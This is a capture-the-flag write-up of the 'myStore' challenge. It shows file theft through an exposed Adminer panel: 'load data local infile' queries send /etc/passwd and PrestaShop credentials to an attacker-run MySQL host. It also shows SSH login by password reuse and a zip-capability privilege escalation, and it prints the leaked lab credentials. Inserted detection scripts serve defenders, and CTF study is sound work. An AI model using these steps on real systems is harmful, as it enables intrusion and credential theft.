

.:: myStore - SANTHACKLAUS CTF 2019 ::.
Title : myStore - SANTHACKLAUS CTF 2019
Author : Cabir  
Date : Sunday, Oct 25, 2020
Modified : Sunday, Oct 25, 2020
Reading time: 3 minutes and 55 seconds.

.: DESCRIPTION :.

One of your friends wants to launch his online shop at https://mystore.santhacklaus.xyz. You quickly briefed him on the basic principles of IT security and he assures you that he has followed all your advice. Conduct your audit and show him that his platform is not properly secured!


-=[CVE used to reach a remote DB from a vulnerable Adminer]=-

First, nmap the web app:

    $ sudo nmap -Pn -v -p- -oN nmap2.log 46.30.204.42
    Discovered open port 8080/tcp on 46.30.204.42
    Discovered open port 22/tcp on 46.30.204.42
    Discovered open port 443/tcp on 46.30.204.42
    Discovered open port 80/tcp on 46.30.204.42
    (yes my output sucks, I forgot to save it)

Even though I spent a lot of hours fuzzing URLs and testing CVEs on Prestashop, it didn't lead me anywhere. I switched from dirb to dirsearch and then magic happened.

    python3 dirsearch/dirsearch.py -u https://mystore.santhacklaus.xyz/ -e php --plain-text-report=dirsearch_app.log

Here are the results we have:

    200     4KB  https://mystore.santhacklaus.xyz:443/adminer.php
    200   306KB  https://mystore.santhacklaus.xyz:443/composer.lock
    200    47KB  https://mystore.santhacklaus.xyz:443/index.php
    200     3KB  https://mystore.santhacklaus.xyz:443/robots.txt

Adminer is a PHP administration tool that users can host on their websites to remotely administer MySQL databases. Unfortunately, many websites leave Adminer publicly accessible, meaning attackers can attempt to log into the victim's databases through this tool. Here is https://mystore.santhacklaus.xyz:443/adminer.php :

Adminer is in version 4.6.2.

This version is prone to multiple vulnerabilities, such as this one: https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

1. Adminer permits connecting to a remote MySQL server (it is not restricted to local databases).

2. From the SQL console in Adminer, we can import and read files stored on the web server hosting Adminer (LOAD DATA LOCAL INFILE makes the PHP client read the file and send it to the MySQL server we control).

3. Then we steal the credentials from the sensitive files we read, to connect to the local database directly.
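The tell-tale sign of step 1 on the victim side is the web server process opening an outbound MySQL connection to a host that is not its own database. The following detection logic, added here as an example and not part of the original write-up, parses constructed `ss -tnp` output (the sample lines and the allow-list are the editor's assumptions) and reports such connections:

```python
import re
from ipaddress import ip_address

# Constructed sample of `ss -tnp` output on the web host (not taken from the write-up).
# The second ESTAB line is what an Adminer login against an attacker-chosen server looks like.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB  0      0      127.0.0.1:51234      127.0.0.1:3306      users:(("php-fpm7.2",pid=1201,fd=12))
ESTAB  0      0      10.0.0.5:48212       203.0.113.9:3306    users:(("php-fpm7.2",pid=1201,fd=14))
ESTAB  0      0      10.0.0.5:443         198.51.100.7:52110  users:(("nginx",pid=900,fd=8))
"""

# One `ss -tnp` row: state, queues, local addr:port, peer addr:port, owning process name.
LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)\s+users:\(\(\"(?P<proc>[^\"]+)\""
)

DB_PORTS = {3306}  # MySQL; extend for other database listeners you run


def parse_ss(text):
    """Turn `ss -tnp` text into dicts; header and unparseable rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["lport"], d["rport"] = int(d["lport"]), int(d["rport"])
        d["raddr"] = d["raddr"].strip("[]")  # ss prints IPv6 peers as [addr]
        rows.append(d)
    return rows


def rogue_db_connections(text, allowed_db_hosts=("127.0.0.1",)):
    """Return (process, peer) for DB-port connections to hosts outside the allow-list."""
    hits = []
    for r in parse_ss(text):
        if r["rport"] not in DB_PORTS:
            continue
        if ip_address(r["raddr"]).is_loopback or r["raddr"] in allowed_db_hosts:
            continue
        hits.append((r["proc"], f"{r['raddr']}:{r['rport']}"))
    return hits


if __name__ == "__main__":
    for proc, peer in rogue_db_connections(SAMPLE_SS):
        print(f"ALERT: {proc} connected to foreign database server {peer}")
```

Run it periodically (or feed it live `ss -tnp` output); the web server's PHP workers should never talk to a MySQL server other than the application's own.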

To do that, I used this free online MySQL provider: https://remotemysql.com/ After your account is created, you receive an email with your credentials:

    Hi

    Your account number is: 381264

    Your new database is now ready to use.

    To connect to your database use these details

    Server: sql7.freemysqlhosting.net
    Name: sql7363454
    Username: sql7363454
    Password: ************
    Port number: 3306

With these credentials, I connected to the Adminer panel.

Then here we are:

From the website I linked earlier, we have this request:

    load data local infile 'app/etc/local.xml' into table test.xml fields terminated by "\n"

In this example we read 'app/etc/local.xml' from the machine running Adminer and store it in the test.xml table of the remote MySQL server. But I encountered many errors:

    Error in query (1148): The used command is not allowed with this MySQL version

    SHOW VARIABLES LIKE 'local_infile';

    Variable_name	Value
    local_infile	OFF

    SET GLOBAL local_infile = 1;

    Error in query (1227): Access denied; you need (at least one of) the SUPER or
    SYSTEM_VARIABLES_ADMIN privilege(s) for this operation

All these errors were because the MySQL host on remotemysql.com was version 8, and we can't use the "load data" command there. So I tried another remote MySQL server: freemysqlhosting.net. That one was MySQL 5. So, good news, "load data" WORKS!

Then I read "/etc/passwd":

    load data local infile '/etc/passwd' into table whitepapers fields terminated by "\n"

Here it is:

    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    john:x:1001:1001:,,,:/home

User john seems interesting. After reading all the Prestashop forums and all of Prestashop's code on GitHub, I found the "app/config/parameters.php" file. This is where Prestashop stores its database credentials.

    load data local infile 'app/config/parameters.php' into table whitepapers fields terminated by "\n"

Here it is:

    'parameters' =>
        'database_port' => '',
        'database_password' => 'KA6$g@Tx0{(Si4bR3DT4',
        'mailer_transport' => 'smtp',
        'mailer_password' => NULL,
        'ps_cache_enable' => false,
        'cookie_key' => 'fgEckT9sZEACDaiAfoaYz0X2A89xgskcStbCP9KJx1brOsT1uNc9sxs9',
        ),
    Set parameters here that may be different on each deployment target
    e.g. development, ...
    database_host:     127.0.0.1
    database_user:     root
    database_engine: InnoDB

From here we connect ourselves to the database.

We can see everything in the database, such as clients' emails and passwords. At this point, what we all do is search every table for something interesting. I won't explain the long hours I needed to remember this: I had launched an nmap. The SSH port is OPEN. Maybe john is an assh*** and he reused the same password on SSH. He did...

    $ ssh john@46.30.204.42
    $ cat flag.txt

    FLAG IS: SANTA{That-W4Z/a/C0ol-CV3!}

-=[PART 2 - TL;DR - Deilyora]=-

Privilege escalation with Linux capabilities

Now the next flag.txt is in /home/admin/flag.txt. Logged in as user john, we don't have permission to read it. Let's go for a privesc! To begin, we fired off lse.sh, an automated privesc scanner. Something interesting was returned to us:

    $ wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh
    $ ./lse.sh -l 1
    [...]
    [*] sec010 List files with capabilities.................................... yes!
    ---
    /usr/bin/mtr-packet = cap_net_raw+ep
    /usr/bin/zip = cap_dac_read_search+ep
    ---
    [...]

To get the same result with a single command, we can use getcap:

    $ getcap -r / 2>/dev/null
    /usr/bin/mtr-packet = cap_net_raw+ep
    /usr/bin/zip = cap_dac_read_search+ep

Source: https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 According to the article, if the tar command has cap_dac_read_search+ep, we can read anything on the system. We don't have that capability on tar, but we have it on zip. Let's do it with the zip command.
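An admin auditing a box wants the getcap output triaged rather than read by eye. The following script, added here as an example and not part of the original write-up, parses getcap output in both the older `path = caps+flags` form shown above and the newer `path caps=flags` form, and flags capabilities that grant read/write/identity bypass (the watch-list and the sample lines, including the constructed /opt/backup/dump entry, are the editor's assumptions):

```python
import re

# Constructed `getcap -r /` output modelled on the write-up's findings (sample data, not a real host).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/zip = cap_dac_read_search+ep
/usr/bin/python3.6 cap_setuid=ep
/opt/backup/dump = cap_dac_read_search+p
"""

# Defender's watch-list (editor's assumption): capabilities that bypass DAC checks or change identity.
# A permitted-only (+p) capability is still reported: the program can raise it into its effective set.
DANGEROUS = {
    "cap_dac_read_search": "bypasses read permission checks on any file (what zip has here)",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_setuid": "can switch to any UID, including root",
    "cap_setgid": "can switch to any GID",
    "cap_sys_admin": "broad admin capability (mounts, namespaces, ...)",
    "cap_sys_ptrace": "can attach to and inject into other processes",
    "cap_chown": "can change file ownership",
}

# Accepts "/usr/bin/zip = cap_dac_read_search+ep" (libcap < 2.41) and "/usr/bin/zip cap_dac_read_search=ep".
CAP_RE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>[a-z_0-9,]+)[=+](?P<flags>[eip]+)$")


def parse_getcap(text):
    """Return [(path, [cap, ...], flags)] for every parseable getcap line."""
    entries = []
    for line in text.splitlines():
        m = CAP_RE.match(line.strip())
        if m:
            entries.append((m["path"], m["caps"].split(","), m["flags"]))
    return entries


def risky_binaries(text):
    """Return [(path, cap, flags)] for each dangerous capability found, in file order."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        for cap in caps:
            if cap in DANGEROUS:
                findings.append((path, cap, flags))
    return findings


if __name__ == "__main__":
    for path, cap, flags in risky_binaries(SAMPLE_GETCAP):
        print(f"{path}: {cap}+{flags} -> {DANGEROUS[cap]}")
```

Pipe real output in with `getcap -r / 2>/dev/null | python3 script.py` after swapping SAMPLE_GETCAP for sys.stdin.read(); cap_net_raw on ping and mtr-packet is normal and is deliberately not on the list.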

    $ zip flag.zip /home/admin/flag.txt
      adding: home/admin/flag.txt (stored 0%)

It seems to work. We can now try to unzip and cat the flag.

    $ unzip flag.zip
    Archive:  flag.zip
     extracting: home/admin/flag.txt
    $ cat home/admin/flag.txt

    SANTA{4lWayZ-cH3cK-C4paBiliT13s}

It worked!

.: FLAG :.

PART1: SANTA{That-W4Z/a/C0ol-CV3!} PART2: SANTA{4lWayZ-cH3cK-C4paBiliT13s}
